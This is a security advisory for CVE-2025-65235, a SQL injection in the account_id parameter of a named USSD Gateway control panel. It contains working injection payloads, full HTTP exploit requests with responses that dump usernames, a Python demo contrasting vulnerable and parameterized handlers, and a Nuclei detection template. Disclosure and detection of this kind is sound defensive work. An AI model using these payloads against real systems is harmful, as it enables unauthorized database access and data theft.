# \[CVE-2025-65235] USSD GW SQL Injection - SubUsers

## Description

SQL injection in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems](https://opencode.com/) allows a user who has access to the vulnerable function to dump the database by injecting SQL commands. \
<https://www.cve.org/CVERecord?id=CVE-2025-65235>

## Application Details

* **Name**: USSD Gateway
* **Vendor**: OpenCode Systems
* **Version**: OC Release 5 - Version 6.13.11

## Technical Details

* **Vulnerable Endpoint**: `/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider`
* **Vulnerable Parameter**: `account_id`
* **Payload Sample:** `account_id=1; SELECT SLEEP(5)#`

## Exploitation

The default request returns the username for an account based on its account ID. The request and its response are shown below:

```http
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

account_id=1
```

```http
HTTP/2 200 OK
[...]


{"1" :"USERNAME" }
```

Appending the payload to the parameter causes all the usernames to be returned in the response.

> You can use different payloads; the one below was used as a POC.

```http
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]

account_id=1+or+1=1--+-
```

```http
HTTP/2 200 OK
[...]

{ 
	"1" : "Username", "3" : "Username", "4" : "Username", "5" : "Username", "6" : "Username", "7" :"Username", "8" : "Username", "9" :"test Username" ," 10" :"Username" ,"11" :"Username" ," 12" :"Username" ,"13" :"Username" , " 14" :"mu[...]1","15":"mu[...]2" ,"16" :"mu[...]3" ,"17" :"mu[...]4" ,"18" :"mu[...]5"
	[...] 
}
```
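The behaviour above and the fix for it, as an added example (not the vendor's code, which this advisory does not show). It assumes the handler concatenates `account_id` into the query text; SQLite stands in for the production database, and the table, column names and usernames are constructed.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample data; table and column names are hypothetical.
ROWS = [(1, 1, "alice"), (3, 2, "bob"), (4, 2, "carol"), (5, 3, "dave")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sub_users (id INTEGER, account_id INTEGER, username TEXT)")
    db.executemany("INSERT INTO sub_users VALUES (?, ?, ?)", ROWS)
    return db


def account_id_from_body(body):
    """Decode the form body the way a server would ('+' becomes a space)."""
    return parse_qs(body, keep_blank_values=True).get("account_id", [""])[0]


def sub_users_vulnerable(db, body):
    # Assumed flaw: the raw parameter is concatenated into the SQL text, so
    # anything after the number is parsed as SQL rather than treated as data.
    account_id = account_id_from_body(body)
    sql = "SELECT id, username FROM sub_users WHERE account_id = " + account_id + " ORDER BY id"
    return {str(i): u for i, u in db.execute(sql)}


def sub_users_hardened(db, body):
    # 1. Allow-list the type: account_id must be a short decimal integer.
    account_id = account_id_from_body(body)
    if not re.fullmatch(r"[0-9]{1,10}", account_id):
        raise ValueError("account_id must be an integer")
    # 2. Bind the value as a parameter so it is never parsed as SQL.
    sql = "SELECT id, username FROM sub_users WHERE account_id = ? ORDER BY id"
    return {str(i): u for i, u in db.execute(sql, (int(account_id),))}


if __name__ == "__main__":
    db = make_db()
    for body in ("account_id=1", "account_id=1+or+1=1--+-"):
        print(body, "-> vulnerable:", sub_users_vulnerable(db, body))
        try:
            print(body, "-> hardened:", sub_users_hardened(db, body))
        except ValueError as exc:
            print(body, "-> hardened: rejected,", exc)
```

The bound parameter is the actual fix; the integer check is defence in depth and gives the caller a clean error instead of an empty result.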

## Nuclei Template

You can use this template for easy detection.

```yaml
id: ocpanel-ussdgw-sqli

info:
  name: USSD Gateway OCP Control Panel SQL Injection
  author: Eslam Ali Akl
  severity: high
  description: |
    Time-based SQL injection test for the getSubUsersByProvider endpoint.
    Injects a SLEEP(5) payload into the account_id parameter and flags the
    target if the response time indicates the SQL sleep was executed.
  tags: [sqli, time-based, ocpanel]

requests:
  - id: time_inject
    method: POST
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider"
    headers:
      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
      X-Requested-With: "XMLHttpRequest"
      User-Agent: "nuclei-scan"
    body: "account_id=1; SELECT SLEEP(5)#"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 4"

```
